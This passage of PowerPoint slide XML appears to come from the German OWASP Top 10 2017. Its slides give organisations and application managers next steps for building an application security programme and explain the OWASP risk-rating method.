            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2245920832"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939598"/>
          <a:ext cx="6854400" cy="8966402"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="353170">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just"/>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0"/>
                        <a:t>Starten Sie jetzt Ihre</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" baseline="0" noProof="0" dirty="0"/>
                        <a:t> Offensive </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0"/>
                        <a:t>zur Anwendungssicherheit!</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1100" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="49530" marB="4953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13232">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Anwendungssicherheit ist nicht mehr länger optional. Organisationen müssen leistungsfähige Prozesse und Ressourcen zur Absicherung ihrer Anwendungen und APIs schaffen, um im Umfeld einer steigenden Zahl von Angriffen einerseits und regulatorischen Vorschriften andererseits bestehen zu können.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950"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Auf Grund der atemberaubenden Mengen an Code in zahlreichen Anwendungen und APIs haben viele Organisationen Probleme, mit dem enormen Umfang an Sicherheitslücken zurecht zu kommen. OWASP empfiehlt den Aufbau eines Programms zur Anwendungssicherheit, um einen Überblick über die Sicherheitslage ihrer Anwendungen und APIs zu erhalten und diese zu verbessern. Um das Sicherheitsniveau zu erhöhen, müssen viele Unternehmensbereiche effizient zusammenarbeiten, von Security und Audit über die Entwicklungsabteilung und das Business bis hin zum Management. Die Sicherheitsarchitektur muss transparent und messbar sein, damit alle Beteiligten die Ziele der Anwendungssicherheit im </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="90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Unternehmen</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 nachvollziehen zu können. Konzentrieren Sie sich auf die Aktivitäten und Resultate, die tatsächlich zur Unternehmenssicherheit beitragen, indem Sie Risiken eliminieren oder reduzieren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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP SAMM</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 und der </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hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Application</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hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t> Security Guide </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>for</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hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t> CISOs</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 sind die Quellen für die meisten der Schlüsselaktivitäten in dieser Liste.</a:t>
                      </a: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just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="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1"/>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a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" noProof="0"/>
              <a:t>Nächste Schritte für Organisationen</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" noProof="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4181081767"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="3209540"/>
          <a:ext cx="8686800" cy="660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Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F9A383-1D7C-437C-BD6E-2E22B4AF47C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="40133" y="8879889"/>
            <a:ext cx="1215135" cy="876009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sorgen Sie </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>für Sicht-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="1050" b="1" err="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>barkeit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> beim Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="444500">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1050" b="1">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3241611549"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6854400" cy="8966400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="342059">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Regeln Sie den vollständigen Lebenszyklus von Anwendungen</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4341">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de-DE" sz="950" b="0" kern="1200" noProof="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Anwendungen </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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gehören zu den komplexesten Systemen, die Menschen regelmäßig erschaffen und betreiben. Das IT-Management von Anwendungen sollte von IT-Spezialisten erfolgen, die für den vollständigen Lebenszyklus einer Anwendung verantwortlich sind. Wir empfehlen, die Rolle des Anwendungs-Verantwortlichen (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" kern="1200" noProof="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 Manager</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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als technisches Pendant zum Anwendungs-Eigentümer (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" kern="1200" noProof="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 Owner</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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zu etablieren. Der Anwendungs-Verantwortliche ist für den gesamten Lebenszyklus der Anwendung bezüglich der IT-Belange zuständig, von der Erhebung </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>der fachlichen Anforderungen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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bis hin zur Außerbetriebnahme der Systeme. Letzteres wird häufig übersehen.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-A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de-DE"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pPr>
                      <a:br>
                        <a:rPr lang="en-US" sz="10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br>
                      <a:endParaRPr lang="en-AU" sz="10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+A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE"/>
              <a:t>Nächste Schritte für Anwendungs-Verantwortliche</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Diagram 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1006478684"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-8620" y="2268000"/>
          <a:ext cx="6858000" cy="755333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p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1256102908"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6854400" cy="8961244"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="338400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Es geht um die Risiken, die Schwachstellen darstellen</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1600" b="1" noProof="0"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844">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Die Methode der Risikobewertung der Top 10 basiert auf der </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t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Risk</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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>-Rating-Methode</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 Für jede Kategorie der</a:t>
                      </a:r>
                      <a:b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b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Top 10 schätzten wir das typische Risiko ab, das die entsprechende Schwachstelle in einer üblichen Webanwendung </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>verur</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-sacht, indem wir die allgemeinen Wahrscheinlichkeits- und Auswirkungs-Faktoren für die jeweilige Schwachstelle betrachte-ten. Dann sortierten wir die Top 10 gemäß der Schwachstellen, die im Allgemeinen das größte Risiko für eine Anwendung darstellen. Die zugrundeliegenden Faktoren werden für jede</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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Version </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der Top 10 geprüft und auf einen aktuellen Stand gebracht, da </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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sich Dinge </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ständig ändern und entwickeln.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Die</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Risk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>-Rating-Methode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> definiert zahlreiche Faktoren, die helfen, das Risiko einer gefundenen Schwachstelle zu bewerten. Unabhängig davon ist die Top 10 allgemein gehalten und geht weniger auf spezifische Schwachstellen realer Anwendungen und APIs ein. Daher können wir niemals so genau wie derjenige sein, der das Risiko für seine eigene(n) Anwendung(en) abschätzt. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Nur Sie selbst können am besten beurteilen, wie hoch der konkrete Schutzbedarf der Anwendung ist, wie wichtig die verarbeiteten Daten sind, wer oder was die Bedrohungsquellen darstellen und wie das System entwickelt wurde und betrieben wird.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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Unsere Methodik beinhaltet drei Wahrscheinlichkeits-Faktoren für jede Schwachstelle („Verbreitung“, „Auffindbarkeit“ und „Ausnutzbarkeit“) und einen Faktor zur „Technischen Auswirkung“. Die Gewichtung für jeden Faktor liegt zwischen „1-Niedrig“ und „3-Hoch“, in geeigneter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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Terminologie für d</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en jeweiligen Faktor. Die „Verbreitung“ einer Schwachstelle muss </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>üblicherwei</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-se nicht abgeschätzt werden. Hierfür haben uns verschiedene Organisationen Statistiken zur Verfügung gestellt (vgl. Kapitel „</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0" noProof="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Danksagung</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 auf Seite 25), die wir zu einer Top 10 Liste des Wahrscheinlichkeits-Faktors für die „Verbreitung“ zusammen-gestellt haben. Diese Daten wurden dann mit den beiden anderen Wahrscheinlichkeits-Faktoren für „Auffindbarkeit“ und „Ausnutzbarkeit“ gemittelt, um eine Bewertung der </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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Eintrittswahrscheinlichkeit </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für jede Schwachstelle zu berechnen. Dieser Wert wurde im </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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Folgenden mit unserem Schätzwert für die </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„Technische Auswirkung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" strike="sngStrike" baseline="0" noProof="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 de</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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 jeweiligen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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Schwachstelle </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multipliziert, um so zu einer Gesamtbewertung der Risiko-Einstufung zu gelangen (je höher das Ergebnis, desto höher das Risiko). „Auffindbarkeit“, „Ausnutzbarkeit“ und „Technischen Auswirkungen“ wurden dabei durch die Analyse der CVEs, die für die jeweiligen Kategorie der Top 10 einschlägig sind, bestimmt.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Es bleibt anzumerken</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 dass dieser Ansatz die Wahrscheinlichkeit der Bedrohungsquelle nicht mit berücksichtigt, ebenso wenig wie irgendwelche technischen Details der betroffenen Anwendung. Jeder dieser Faktoren könnte die Gesamtwahr-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>scheinlichkeit</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 dass ein Angreifer eine bestimmte Schwachstelle findet und ausnutzt, signifikant beeinflussen. Dieses </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Bewer-tungsschema</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 berücksichtig auch nicht die Auswirkungen auf das jeweilige Unternehmen und die Geschäftsprozesse. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" u="sng"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Die betroffene Organisation oder das Unternehmen</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 wird für sich selbst entscheiden müssen, welches Sicherheitsrisiko durch (verwundbare) Anwendungen oder APIs sie oder es bereit ist zu tragen. Es ist nicht Sinn und Zweck der OWASP Top 10, Ihnen diese Risikoanalyse abzunehmen oder für Sie durchzuführen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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Die folgende Darstellung zeigt die Berechnung des Risikos für </a:t>
                      </a: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A6:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0" noProof="0" dirty="0">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-Sicherheitsrelevante Fehlkonfiguration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8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
